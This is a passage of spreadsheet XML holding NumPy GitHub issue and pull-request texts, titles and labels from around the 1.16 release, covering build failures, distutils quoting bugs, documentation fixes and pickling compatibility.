IMPORTANT: PLEASE READ THIS FOR ADVICE ON HOW TO SOLVE THIS ISSUE!_x000D_
_x000D_
Importing the multiarray numpy extension module failed.  Most_x000D_
likely you are trying to import a failed build of numpy._x000D_
Here is how to proceed:_x000D_
- If you're working with a numpy git repository, try `git clean -xdf`_x000D_
  (removes all files not under version control) and rebuild numpy._x000D_
- If you are simply trying to use the numpy version that you have installed:_x000D_
  your installation is broken - please reinstall numpy._x000D_
- If you have already reinstalled and that did not fix the problem, then:_x000D_
  1. Check that you are using the Python you expect (you're using /Library/Frameworks/Python.framework/Versions/3.7/bin/python3),_x000D_
     and that you have no directories in your PATH or PYTHONPATH that can_x000D_
     interfere with the Python and numpy versions you're trying to use._x000D_
  2. If (1) looks fine, you can open a new issue at_x000D_
     https://github.com/numpy/numpy/issues.  Please include details on:_x000D_
     - how you installed Python_x000D_
     - how you installed numpy_x000D_
     - your operating system_x000D_
     - whether or not you have multiple versions of Python installed_x000D_
     - if you built from source, your compiler versions and ideally a build log_x000D_
_x000D_
     Note: this error has many possible causes, so please don't comment on_x000D_
     an existing issue about this - open a new one instead._x000D_
_x000D_
Original error was: dlopen(/Users/artcs/Library/Python/3.7/lib/python/site-packages/numpy/core/_multiarray_umath.cpython-37m-darwin.so, 2): Symbol not found: __tlv_bootstrap_x000D_
  Referenced from: /Users/artcs/Library/Python/3.7/lib/python/site-packages/numpy/core/../.dylibs/libopenblasp-r0.3.5.dev.dylib_x000D_
  Expected in: /usr/lib/libSystem.B.dylib_x000D_
 in /Users/artcs/Library/Python/3.7/lib/python/site-packages/numpy/core/../.dylibs/libopenblasp-r0.3.5.dev.dylib_x000D_
```_x000D_
This happens with Python 2.7.15 as well as 3.7.1._x000D_
A websearch for `__tlv_bootstrap` shows this seems to be an error related to libs compiled with llvm on MacOS 10.7 which causes them to no longer work on 10.6._x000D_
The wheel installed via `pip install --user numpy` implies compatibility with 10.6 however and installation works fine. Only it cannot be used. Can this be fixed or if not can someone point me to the latest working version for SL?</t>
  </si>
  <si>
    <t>Cannot import numpy on MacOS 10.6 SnowLeopard</t>
  </si>
  <si>
    <t xml:space="preserve">Correct negative_binomial docstring to reflect the correct treatment of_x000D_
floats when used_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>DOC: Correct negative_binomial docstring</t>
  </si>
  <si>
    <t xml:space="preserve">If numpy is built with only .pyc files in the distributable, numpy.distutils.fcompiler will not work as there will be no available fcompiler classes due to a glob explicity looking for .py files._x000D_
_x000D_
## How to reproduce error_x000D_
_x000D_
Build numpy with the following command:#_x000D_
```bash_x000D_
python setup.py build_ext bdist_egg --exclude-source-files_x000D_
```_x000D_
_x000D_
Attempt to get a fortran compiler: _x000D_
_x000D_
```python_x000D_
from numpy.distutils import fcompiler_x000D_
compiler = fcompiler.get_default_fcompiler()_x000D_
```_x000D_
_x000D_
This will show the message at [numpy.distutils.fcompiler.\_\_init\_\_:891](https://github.com/numpy/numpy/blob/master/numpy/distutils/fcompiler/__init__.py#L891) with no supported compilers - this is because the glob at line [775](https://github.com/numpy/numpy/blob/master/numpy/distutils/fcompiler/__init__.py#L775) specifically looks for only .py files._x000D_
_x000D_
Maybe it would be better to use some of the package management modules to list the available compilers instead of using a glob?_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
Numpy 1.15.4_x000D_
Python 3.5.2_x000D_
</t>
  </si>
  <si>
    <t>numpy.distutils.fcompiler fails to work if the distributable uses only .pyc files</t>
  </si>
  <si>
    <t xml:space="preserve">The pointer 'current' could be NULL in case the above 'while (current != NULL) {..}' loop finishes without break._x000D_
_x000D_
Maybe I'm missing some logic, but better safe than sorry..._x000D_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</si>
  <si>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do not dereference NULL pointer</t>
  </si>
  <si>
    <t xml:space="preserve">The 'itemsize != 0' condition was already verified._x000D_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</si>
  <si>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Remove recurring check</t>
  </si>
  <si>
    <t>&lt;!--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Note about the fixed bug: the `axis` parameter of `np.take_along_axis` is not `a` (this is the array) but the same axis value as used with `np.argsort`._x000D_
_x000D_
I also extended the documentation to see how `np.take_along_axis` can be used.</t>
  </si>
  <si>
    <t>DOC: fix documentation bug in np.argsort and extend examples</t>
  </si>
  <si>
    <t xml:space="preserve">This merges `PyUFunc_SimpleUnaryOperationTypeResolver` and `PyUFunc_SimpleBinaryOperationTypeResolver`_x000D_
_x000D_
These are almost identical, save for using `ResultType` vs simply forcing a byte order._x000D_
_x000D_
This comes at the cost of a handful of branches, which should be insignifcant compared to the rest of the ufunc overhead._x000D_
_x000D_
Spin off from #7876, where I was about to add `PyUFunc_SimpleTernaryOperationTypeResolver` and thought better of it._x000D_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</si>
  <si>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Merge together the unary and binary type resolvers</t>
  </si>
  <si>
    <t>Fixes #12912 by removing the test</t>
  </si>
  <si>
    <t>MAINT: remove complicated test of multiarray import failure mode</t>
  </si>
  <si>
    <t xml:space="preserve">The other module names end with `tests` and are not detected as tests. Making that rename seems to fix things. The source code should also be moved out of the `multiarray` directory and into `src` so it is not lost in the multiarray code._x000D_
_x000D_
For reference on "new" files appearing during installation, `*.so` files are wrapped with a python file of the same name but `*.py` extension when installed. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>pytest thinks `_multiarray_module_test` is a test it should run, fails.</t>
  </si>
  <si>
    <t>See #8576 _x000D_
This is my first time messing with the Python C API, so I hope I didn't mess up too bad. I appreciate any feedback!_x000D_
_x000D_
- Soren</t>
  </si>
  <si>
    <t>ENH: pathlib support for fromfile(), .tofile() and .dump()</t>
  </si>
  <si>
    <t>&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
The [documentation](https://docs.scipy.org/doc/numpy-1.16.1/reference/generated/numpy.ndarray.tolist.html) for `ndarray.tolist` says:_x000D_
_x000D_
&gt; Return the array as a (possibly nested) list._x000D_
_x000D_
But for zero-dimensional arrays, `tolist` returns a scalar:_x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; type(np.array(1.23).tolist())_x000D_
&lt;class 'float'&gt;_x000D_
```_x000D_
_x000D_
This behaviour makes perfect sense: for an `n`-dimensional array, I expect `n` levels of nesting in the resulting list, but it's confusing that something called `tolist` isn't returning a list._x000D_
_x000D_
Would it be worth mentioning this zero-dimensional special case explicitly in the documentation, so that it's clear that it's intentional behaviour, and something that can be relied upon?_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
Python 3.7.2, NumPy 1.15.4.</t>
  </si>
  <si>
    <t xml:space="preserve">DOC: mention 0d corner case in ndarray.tolist </t>
  </si>
  <si>
    <t>Newly released NumPy 1.16.1 built and installed from source fails to run tests:_x000D_
_x000D_
&gt; python3 setup.py build_x000D_
&gt; sudo python3 setup.py install_x000D_
_x000D_
```_x000D_
import numpy_x000D_
numpy.test('full')_x000D_
NumPy version 1.16.1_x000D_
NumPy relaxed strides checking option: True_x000D_
_x000D_
================================================================================================================== ERRORS ===================================================================================================================_x000D_
_____________________________________________________________________________________________ ERROR collecting core/_multiarray_module_test.py _______________________________________________________________________________________________x000D_
import file mismatch:_x000D_
imported module 'numpy.core._multiarray_module_test' has this __file__ attribute:_x000D_
  /usr/local/lib/python3.6/dist-packages/numpy-1.16.1-py3.6-linux-x86_64.egg/numpy/core/_multiarray_module_test.cpython-36m-x86_64-linux-gnu.so_x000D_
which is not the same as the test file we want to collect:_x000D_
  /usr/local/lib/python3.6/dist-packages/numpy-1.16.1-py3.6-linux-x86_64.egg/numpy/core/_multiarray_module_test.py_x000D_
HINT: remove __pycache__ / .pyc files and/or use a unique basename for your test file modules_x000D_
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Interrupted: 1 errors during collection !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!_x000D_
1 error in 4.18 seconds_x000D_
False_x000D_
```</t>
  </si>
  <si>
    <t>Numpy 1.16.1 fails to run tests</t>
  </si>
  <si>
    <t>['00 - Bug', '53 - Invalid']</t>
  </si>
  <si>
    <t>This reverts gh-12508 for now. It caused this hard to understand issue when running `make dist`:_x000D_
```_x000D_
install -d /home/rgommers/code/numpy/doc/build/inst-dist/lib/python3/site-packages /home/rgommers/code/numpy/doc/build/inst-dist/local/lib/python3/site-packages /home/rgommers/code/numpy/doc/build/inst-dist/lib/python3/dist-packages /home/rgommers/code/numpy/doc/build/inst-dist/local/lib/python3/dist-packages_x000D_
PYTHONPATH=/home/rgommers/code/numpy/doc/build/inst-dist/lib/python3/site-packages:/home/rgommers/code/numpy/doc/build/inst-dist/local/lib/python3/site-packages:/home/rgommers/code/numpy/doc/build/inst-dist/lib/python3/dist-packages:/home/rgommers/code/numpy/doc/build/inst-dist/local/lib/python3/dist-packages python3 `which easy_install` --prefix=/home/rgommers/code/numpy/doc/build/inst-dist ../dist/*.egg_x000D_
TEST FAILED: /home/rgommers/code/numpy/doc/build/inst-dist/lib/python3.6/site-packages does NOT support .pth files_x000D_
error: bad install directory or PYTHONPATH_x000D_
_x000D_
You are attempting to install a package to a directory that is not_x000D_
on PYTHONPATH and which Python does not read ".pth" files from.  The_x000D_
installation directory you specified (via --install-dir, --prefix, or_x000D_
the distutils default setting) was:_x000D_
_x000D_
    /home/rgommers/code/numpy/doc/build/inst-dist/lib/python3.6/site-packages_x000D_
_x000D_
and your PYTHONPATH environment variable currently contains:_x000D_
_x000D_
    '/home/rgommers/code/numpy/doc/build/inst-dist/lib/python3/site-packages:/home/rgommers/code/numpy/doc/build/inst-dist/local/lib/python3/site-packages:/home/rgommers/code/numpy/doc/build/inst-dist/lib/python3/dist-packages:/home/rgommers/code/numpy/doc/build/inst-dist/local/lib/python3/dist-packages'_x000D_
_x000D_
Here are some of your options for correcting the problem:_x000D_
_x000D_
* You can choose a different installation directory, i.e., one that is_x000D_
  on PYTHONPATH or supports .pth files_x000D_
_x000D_
* You can add the installation directory to the PYTHONPATH environment_x000D_
  variable.  (It must then also be on PYTHONPATH whenever you run_x000D_
  Python and want to use the package(s) you are installing.)_x000D_
_x000D_
* You can set up the installation directory to support ".pth" files by_x000D_
  using one of the approaches described here:_x000D_
_x000D_
  https://setuptools.readthedocs.io/en/latest/easy_install.html#custom-installation-locations_x000D_
_x000D_
_x000D_
Please make the appropriate changes for your system and try again._x000D_
make[1]: *** [Makefile:87: dist-build] Error 1_x000D_
make[1]: Leaving directory '/home/rgommers/code/numpy/doc'_x000D_
make: *** [Makefile:68: dist] Error 2_x000D_
```_x000D_
_x000D_
We can look for a better solution later, but at least `make dist` works now and some docs are added.</t>
  </si>
  <si>
    <t>BLD: fix doc build for distribution.</t>
  </si>
  <si>
    <t xml:space="preserve">See Microsoft dev comments ( @ericsciple ) at: https://github.com/scipy/scipy/pull/9523#issuecomment-459426148_x000D_
_x000D_
Similar PR for SciPy: https://github.com/scipy/scipy/pull/9736_x000D_
_x000D_
Seems to create an expanded list of Azure entries (1 per job) in CI list though for SciPy -- perhaps will do the same here. Not sure if we really want that, but let's see if we can at least get tests passing for now._x000D_
</t>
  </si>
  <si>
    <t>TST: fix vmImage dispatch in Azure</t>
  </si>
  <si>
    <t xml:space="preserve">- add 1.16.1-changelog.rst_x000D_
- add 1.16.1-notes.rst_x000D_
- update mailmap_x000D_
_x000D_
[skip ci]_x000D_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</si>
  <si>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Update master following 1.16.1 release.</t>
  </si>
  <si>
    <t>I am trying to install the below python modules on AIX. Can some one be able to get me the whl files that can be used on AIX. I am running AIX 7.1 (7100-05-03-1846)_x000D_
_x000D_
I already have python 2.7.15-3 and pip installed on my LPAR. can one of you help?!_x000D_
_x000D_
-pandas_x000D_
-numpy_x000D_
-scipy_x000D_
-pydobc_x000D_
-sklearn_x000D_
-matplotlib_x000D_
-sqlalchemy-teradata_x000D_
-tabulate_x000D_
-teradatasql_x000D_
-teradatasqlalchemy_x000D_
-sqlalchemy_x000D_
-keras_x000D_
-pyspark_x000D_
-xgboost_x000D_
-lightgbm_x000D_
-catboost_x000D_
-pytorch_x000D_
-eli5_x000D_
-nltk_x000D_
-spacy_x000D_
-scrapy_x000D_
-gensim_x000D_
-tensorflow_x000D_
-statsmodel_x000D_
-searborn</t>
  </si>
  <si>
    <t>python modules for AIX 7.1 (numpy/scipy, etc.,)</t>
  </si>
  <si>
    <t xml:space="preserve">Numpy arrays with metadata (including units for datetime64) can't have their type copied based only on the typenum._x000D_
This change is in the array_setstate, where it does byte reversal of data from platforms with a different endian value._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">- Create 1.16.1-notes.rst_x000D_
- Create 1.16.1-changelog.rst_x000D_
- Update mailmap_x000D_
_x000D_
[ci skip]_x000D_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</si>
  <si>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Prepare for 1.16.1 release.</t>
  </si>
  <si>
    <t xml:space="preserve">These are not used by our code, but it's possible downstream users are using them - without this patch, they would get a syntax error in their C code._x000D_
_x000D_
This also correctly handles version strings that contain embedded quotes, although probably still fails on non-ascii data._x000D_
_x000D_
Fixes gh-12893, on the probably correct assumption it was broken in the first place._x000D_
_x000D_
[Backport here](https://github.com/numpy/numpy/compare/maintenance/1.16.x...eric-wieser:distutils-extra-quotes-again?expand=1)_x000D_
</t>
  </si>
  <si>
    <t>BUG: Do not insert extra double quote into preprocessor macros</t>
  </si>
  <si>
    <t xml:space="preserve">After the recent patch to CCompiler.spawn, the file-paths no longer need manual quoting - that's handled as needed within subprocess._x000D_
_x000D_
This also states our assumption that our paths do not contain commas._x000D_
If we care about this, we could adopt the approach used by https://github.com/rust-lang/rust/issues/38795._x000D_
_x000D_
Tested locally by looking at the error messages of `subprocess.check_call(["gcc", r'-Wl,spaces and no quotes'])`_x000D_
_x000D_
Fixes #12882_x000D_
_x000D_
[Backport here](https://github.com/numpy/numpy/compare/maintenance/1.16.x...eric-wieser:distutils-debug?expand=1)_x000D_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</si>
  <si>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Do not double-quote arguments passed on to the linker</t>
  </si>
  <si>
    <t xml:space="preserve">The documentation for numpy.any() states that it _x000D_
_x000D_
&gt; Returns single boolean unless axis is not None_x000D_
_x000D_
Calling numpy.any() on an array of strings (dtype=object) returns the first string in the array_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
example_array = np.array(['a', 'b', 'c'], dtype=object)_x000D_
example_array.any()_x000D_
```_x000D_
_x000D_
Returns 'a' (using all() returns 'c')_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.15.2 3.7.0 (v3.7.0:1bf9cc5093, Jun 27 2018, 04:59:51) [MSC v.1914 64 bit (AMD64)]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>numpy.any() and numpy.all() return string instead of bool for arrays of strings</t>
  </si>
  <si>
    <t>['00 - Bug', '50 - Duplicate', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>Both of these functions are better exposed through `distutils.ccompiler`, but neither are used anyway</t>
  </si>
  <si>
    <t>MAINT: Removed unused and confusingly indirect imports from mingw32ccompiler</t>
  </si>
  <si>
    <t>I don't actually have any proof of this, but I strongly suspect the phasing out of `exec_command` has led to another case of extra quotes leaking in, in these lines:_x000D_
_x000D_
https://github.com/numpy/numpy/blob/ba8be5f4eee98662a99cb3843a57030edb1e7f95/numpy/distutils/system_info.py#L1499-L1501_x000D_
_x000D_
https://github.com/numpy/numpy/blob/ba8be5f4eee98662a99cb3843a57030edb1e7f95/numpy/distutils/system_info.py#L1520-L1522_x000D_
_x000D_
https://github.com/numpy/numpy/blob/ba8be5f4eee98662a99cb3843a57030edb1e7f95/numpy/distutils/system_info.py#L2065-L2067_x000D_
_x000D_
Originally, the outer quotes were for shell-escaping, and the inner quotes for the C string literal._x000D_
The text no longer passes through the shell, so the shell escaping is in error, and probably leads to an illegal C string literal._x000D_
_x000D_
If someone can prove this to be true, then the fix is simply to replace `"\\"%s\\""` with `'"%s\"'` in all three cases._x000D_
_x000D_
This will also be affecting downstream projects using `define_macros` with strings. Hopefully the number of people affected will be minimal - I think the removal of `exec_command` has made the escaping story much simpler._x000D_
_x000D_
EDIT: We were actually breaking `distutils` with our `exec_command` patch. So previously importing `numpy.distutils` would actually break code written against normal distutils.</t>
  </si>
  <si>
    <t>BUG: the ATLAS_INFO macro is (probably) an invalid string literal</t>
  </si>
  <si>
    <t>Alternative to #12763, related to #12736._x000D_
_x000D_
Raises an ImportError if we get the wrong `multiarray` or `umath` module, with an error suggesting how to fix. #12763 is more elegant, and tries to allow use of numpy without reinstalling, this will unconditionally raise.</t>
  </si>
  <si>
    <t>BUG: fail if old multiarray module detected</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12871._x000D_
_x000D_
When freezing the numpy module, analyzers like `PyInstall` do not see the import done in `method.c`:  `PyImport_ImportModule("numpy.core._dtype_ctypes")`. Add a python import so the module is picked up and included in the frozen manifest. Related to pyinstaller/pyinstaller#3982 (even though they have a work-around in pyinstaller/pyinstaller#3985)_x000D_
_x000D_
See details for a possible test_x000D_
&lt;details&gt;_x000D_
A test for this would be  _x000D_
_x000D_
```_x000D_
cmd ='''pip install pyinstaller_x000D_
echo "import numpy; print(numpy.ones(10))" &gt; /tmp/test.py_x000D_
pyinstaller /tmp/test_x000D_
dist/test/test'''_x000D_
res = subprocess.check_call(shlex.split(cmd))_x000D_
```_x000D_
but the test I tried setting up a virtual environment proved too fragile._x000D_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</si>
  <si>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add _dtype_ctype to namespace for freeze analysis</t>
  </si>
  <si>
    <t>['01 - Enhancement', '08 - Backport', 'component: numpy.core']</t>
  </si>
  <si>
    <t>a partial mitigation of #12759.
see also https://nvd.nist.gov/vuln/detail/CVE-2019-6446
I'm not sure if this commit should start with 'API:' - and it should
certainly be documented, but I'm not sure if this will go into 1.16 or
1.17.
&lt;!-- Please be sure you are following the instructions in the dev guidelines
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html
--&gt;
&lt;!-- We'd appreciate it if your commit message is properly formatted
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html#writing-the-commit-message
--&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">* skip redundant check (all input arrays are at that point instances of _ndarray_)_x000D_
* use _dtype_ instead of _dtype.str__x000D_
_x000D_
There is an improvement of ~3% _x000D_
_x000D_
```_x000D_
· Running 14 total benchmarks (2 commits * 1 environments * 7 benchmarks)_x000D_
[  0.00%] · For numpy commit 18435496 &lt;master&gt; (round 1/2):_x000D_
[  0.00%] ·· Building for virtualenv-py3.6-six.._x000D_
[  0.00%] ·· Benchmarking virtualenv-py3.6-six_x000D_
[  3.57%] ··· Running (bench_records.Records.time_fromarrays_formats_as_list--)......._x000D_
[ 25.00%] · For numpy commit 2c402b5c &lt;danielhrisca-fromarrays&gt; (round 1/2):_x000D_
[ 25.00%] ·· Building for virtualenv-py3.6-six.._x000D_
[ 25.00%] ·· Benchmarking virtualenv-py3.6-six_x000D_
[ 28.57%] ··· Running (bench_records.Records.time_fromarrays_formats_as_list--)......._x000D_
[ 50.00%] · For numpy commit 2c402b5c &lt;danielhrisca-fromarrays&gt; (round 2/2):_x000D_
[ 50.00%] ·· Benchmarking virtualenv-py3.6-six_x000D_
[ 53.57%] ··· bench_records.Records.time_fromarrays_formats_as_list                                                                 83.4±0.4ms_x000D_
[ 57.14%] ··· bench_records.Records.time_fromarrays_formats_as_string                                                                108±0.3ms_x000D_
[ 60.71%] ··· bench_records.Records.time_fromarrays_w_dtype                                                                         66.0±0.4ms_x000D_
[ 64.29%] ··· bench_records.Records.time_fromarrays_wo_dtype                                                                        86.9±0.5ms_x000D_
[ 67.86%] ··· bench_records.Records.time_fromstring_formats_as_list                                                                 16.6±0.1ms_x000D_
[ 71.43%] ··· bench_records.Records.time_fromstring_formats_as_string                                                                 42.3±1ms_x000D_
[ 75.00%] ··· bench_records.Records.time_fromstring_w_dtype                                                                        5.53±0.04μs_x000D_
[ 75.00%] · For numpy commit 18435496 &lt;master&gt; (round 2/2):_x000D_
[ 75.00%] ·· Building for virtualenv-py3.6-six.._x000D_
[ 75.00%] ·· Benchmarking virtualenv-py3.6-six_x000D_
[ 78.57%] ··· bench_records.Records.time_fromarrays_formats_as_list                                                                 85.5±0.2ms_x000D_
[ 82.14%] ··· bench_records.Records.time_fromarrays_formats_as_string                                                                110±0.3ms_x000D_
[ 85.71%] ··· bench_records.Records.time_fromarrays_w_dtype                                                                         68.5±0.2ms_x000D_
[ 89.29%] ··· bench_records.Records.time_fromarrays_wo_dtype                                                                        89.9±0.1ms_x000D_
[ 92.86%] ··· bench_records.Records.time_fromstring_formats_as_list                                                                 16.5±0.1ms_x000D_
[ 96.43%] ··· bench_records.Records.time_fromstring_formats_as_string                                                               42.1±0.9ms_x000D_
[100.00%] ··· bench_records.Records.time_fromstring_w_dtype                                                                        5.66±0.07μs_x000D_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</si>
  <si>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np.rec.fromarrays on arrays which are already structured</t>
  </si>
  <si>
    <t>Previously, norm was symbolized with a double pipe. Now, it uses the actual norm symbol._x000D_
_x000D_
Also removes unnecessary whitespace after hanging hyphen._x000D_
_x000D_
P.S. Was it supposed to be the 2-norm squared / did I mess up when replacing `^2` with `_2`?</t>
  </si>
  <si>
    <t>DOC: fix math formatting of np.linalg.lstsq docs</t>
  </si>
  <si>
    <t>Try differently to set xcode to 10</t>
  </si>
  <si>
    <t>WIP, TEST: set xcode to 10 via input variable</t>
  </si>
  <si>
    <t>### Steps to reproduce the problem:_x000D_
_x000D_
I've observed a regression on RH7 when installing numpy (currently v1.16.0) with_x000D_
_x000D_
```bash_x000D_
pip install numpy --force-reinstall --ignore-installed --no-binary :all:_x000D_
```_x000D_
_x000D_
Until now I had no problem with python 3.6.5 (and previous) and with earlier versions of numpy (v1.14.3), now I observe the following issue (python 3.7.2, and even python 3.6.5) with numpy 1.16.0._x000D_
_x000D_
I fill `~/site.cfg` with information where to find lapack and blas libraries_x000D_
_x000D_
```ini_x000D_
[lapack]_x000D_
lapack_libs  = lapack_x000D_
language     = gfortran_x000D_
library_dirs = /some/path/rh7/lapack/3.6.1/lib_x000D_
runtime_library_dirs = /some/path/rh7/lapack/3.6.1/lib_x000D_
_x000D_
[blas]_x000D_
blas_libs    = blas,cblas_x000D_
language     = gfortran_x000D_
library_dirs = /some/path/rh7/lapack/3.6.1/lib_x000D_
runtime_library_dirs = /some/path/rh7/lapack/3.6.1/lib_x000D_
```_x000D_
_x000D_
_x000D_
### Observed problem:_x000D_
_x000D_
When I run `ldd` on the produced `numpy/linalg/lapack_lite.cpython-*m-x86_64-linux-gnu.so`, `liblapack.so`,  `libblas.so` and `libblas.so` aren't found._x000D_
_x000D_
When I ask `readelf  -d numpy/linalg/lapack_lite.cpython-*m-x86_64-linux-gnu.so | grep rpath`, I see_x000D_
_x000D_
```_x000D_
 0x000000000000000f (RPATH)              Library rpath: ["/some/path/rh7/lapack/3.6.1/lib"]_x000D_
```_x000D_
_x000D_
instead of _x000D_
_x000D_
```_x000D_
 0x000000000000000f (RPATH)              Library rpath: [/some/path/rh7/lapack/3.6.1/lib]_x000D_
```_x000D_
_x000D_
that I had with previous versions of numpy. _x000D_
_x000D_
Removing the double-quotes with `chrpath`  fixes the issue. _x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
Numpy 1.16.0 (according to `pip -v`)_x000D_
Python 1.6.5 and 1.7.2_x000D_
_x000D_
No trouble with Numpy 1.14.3 (and earlier versions) and Python 1.6.5 (and earlier versions)</t>
  </si>
  <si>
    <t>BLD: Regression: improper double quotes appear in rpath (linux)</t>
  </si>
  <si>
    <t>Related to #11521. The function `get_output` has been warning of removal since 2008. Let's do it.</t>
  </si>
  <si>
    <t>DEP: remove deprecated function</t>
  </si>
  <si>
    <t>['07 - Deprecation', 'component: numpy.distutils']</t>
  </si>
  <si>
    <t>Deprectate `exec_command`, `temp_file_name`,  remove  `_supports_fileno`. None of these are used by numpy internally, only `exec_command` is tested. Fixes #11980. This is a conservative approach, we could also remove these without deprecation.</t>
  </si>
  <si>
    <t>DEP: deprecate exec_command</t>
  </si>
  <si>
    <t>See https://blog.travis-ci.com/2018-11-19-required-linux-infrastructure-migration</t>
  </si>
  <si>
    <t>Remove deprecated ``sudo: false`` from .travis.yml</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!--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This happens while loading saved `npy` - full code it is here https://github.com/loretoparisi/indic-trans/blob/master/indictrans/base.py#L77_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
np.load( '%s/models/%s/classes.npy')_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
_x000D_
```sh_x000D_
Traceback (most recent call last):_x000D_
  File "/usr/local/bin/indictrans", line 10, in &lt;module&gt;_x000D_
    sys.exit(main())_x000D_
  File "/usr/local/lib/python2.7/dist-packages/indictrans/__init__.py", line 299, in main_x000D_
    process_args(args)_x000D_
  File "/usr/local/lib/python2.7/dist-packages/indictrans/__init__.py", line 149, in process_args_x000D_
    trn = Transliterator(args.source, args.target, rb=args.rb, build_lookup=args.build_lookup)_x000D_
  File "/usr/local/lib/python2.7/dist-packages/indictrans/transliterator.py", line 82, in __init___x000D_
    ru2i = Rom2Target(source, target, decoder, build_lookup)_x000D_
  File "/usr/local/lib/python2.7/dist-packages/indictrans/script_transliterate.py", line 63, in __init___x000D_
    build_lookup)_x000D_
  File "/usr/local/lib/python2.7/dist-packages/indictrans/base.py", line 69, in __init___x000D_
    self.base_fit()_x000D_
  File "/usr/local/lib/python2.7/dist-packages/indictrans/base.py", line 117, in base_fit_x000D_
    self.load_models()_x000D_
  File "/usr/local/lib/python2.7/dist-packages/indictrans/base.py", line 80, in load_models_x000D_
    encoding='latin1')[0]_x000D_
  File "/usr/local/lib/python2.7/dist-packages/numpy/lib/npyio.py", line 415, in load_x000D_
    fid = open(os_fspath(file), "rb")_x000D_
  File "/usr/local/lib/python2.7/dist-packages/numpy/compat/py3k.py", line 237, in os_fspath_x000D_
    "not " + path_type.__name__)_x000D_
TypeError: expected str, bytes or os.PathLike object, not unicode_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
```sh_x000D_
python -c "import numpy; print numpy.__version__"_x000D_
1.16.0_x000D_
python --version_x000D_
Python 2.7.1_x000D_
```_x000D_
_x000D_
on `Ubuntu 16.04`_x000D_
_x000D_
This error could be related to https://github.com/numpy/numpy/issues/12749_x000D_
_x000D_
_x000D_
**[WORKAROUND]**_x000D_
Revert back to `python 1.15`:_x000D_
_x000D_
```sh_x000D_
numpy&gt;=1.10.4,&lt;1.16.0_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>TypeError: expected str, bytes or os.PathLike object, not unicode</t>
  </si>
  <si>
    <t>When freezing the numpy module, analyzers like `PyInstall` do not see the import done in `method.c`:  `PyImport_ImportModule("numpy.core._dtype_ctypes")`. Add a python import so the module is picked up and included in the frozen manifest. Related to pyinstaller/pyinstaller#3982 (even though they have a work-around in pyinstaller/pyinstaller#3985)_x000D_
_x000D_
See details for a possible test_x000D_
&lt;details&gt;_x000D_
A test for this would be  _x000D_
_x000D_
```_x000D_
cmd ='''pip install pyinstaller_x000D_
echo "import numpy; print(numpy.ones(10))" &gt; /tmp/test.py_x000D_
pyinstaller /tmp/test_x000D_
dist/test/test'''_x000D_
res = subprocess.check_call(shlex.split(cmd))_x000D_
```_x000D_
but the test I tried setting up a virtual environment proved too fragile.</t>
  </si>
  <si>
    <t>ENH: add c-imported modules to namespace for freeze analysis</t>
  </si>
  <si>
    <t>BUG: do not Py_DECREF NULL pointer</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #12837 _x000D_
When pickling ndarrays, the pickle protocol adds the reconstructing function's __module__` name to the pickled string so it can be called. The function (which is `_reconstruct`) now lives in `numpy.core._multiarray_umath`, but in pre-1.16 numpy it was in `numpy.core.multiarray`. Also for scalar objects, the function `scalar` moved._x000D_
_x000D_
The fix is very simple, changing the `__module__` attribute of `_reconstruct` and `scalar`_x000D_
_x000D_
In `array_reduce_ex`, used when the pickle protocol is 5, the function will be `numpy.core.numeric._frombuffer`, which will not exist on pre-1.16 numpy (added in commit 64a855f421, Oct 2018). I don't think we can work around that. People who do not have that function will have to modify their numpy if they wish to import protocol-5 pickled ndarrays._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BUG: ndarrays pickled by 1.16 cannot be loaded by 1.15.4 and lower</t>
  </si>
  <si>
    <t>Temporarily fix #12856 by pinning the mingw version to 5.3. Without this we get version 8. We should be using the latest toolchain, but need to transition in a controlled manner</t>
  </si>
  <si>
    <t>TEST: pin mingw version</t>
  </si>
  <si>
    <t>TST: Use same OpenBLAS build for testing as for current wheels.</t>
  </si>
  <si>
    <t>Link benchmarking README into devdocs</t>
  </si>
  <si>
    <t>DOC: link to benchmarking info</t>
  </si>
  <si>
    <t>['04 - Documentation', '28 - Benchmark']</t>
  </si>
  <si>
    <t xml:space="preserve">For some time the numpy-wheels daily builds have suffered sporadic `pinv` test failures on linux i386, see https://travis-ci.org/MacPython/numpy-wheels/builds/484516943 for an example. After tedious, and possibly incorrect, bisection the troublesome commit seems to be 062dc8f831e695c2c179482da35affcc6045b4f3, the commit adding pocketfft._x000D_
_x000D_
I don't know more than that at the moment, but put this up to help point folks in the right direction if they want to help debug this._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>numpy-wheels 1.17.0-dev test failures.</t>
  </si>
  <si>
    <t>Note: in https://github.com/numpy/numpy/commit/215a91a9a0e790273a3dc1203709190025ce0641 , `PyArray_SUBTYPE_PRIORITY` was replaced by `NPY_PRIORITY`. Looks suspicious...</t>
  </si>
  <si>
    <t>STY: simplify code</t>
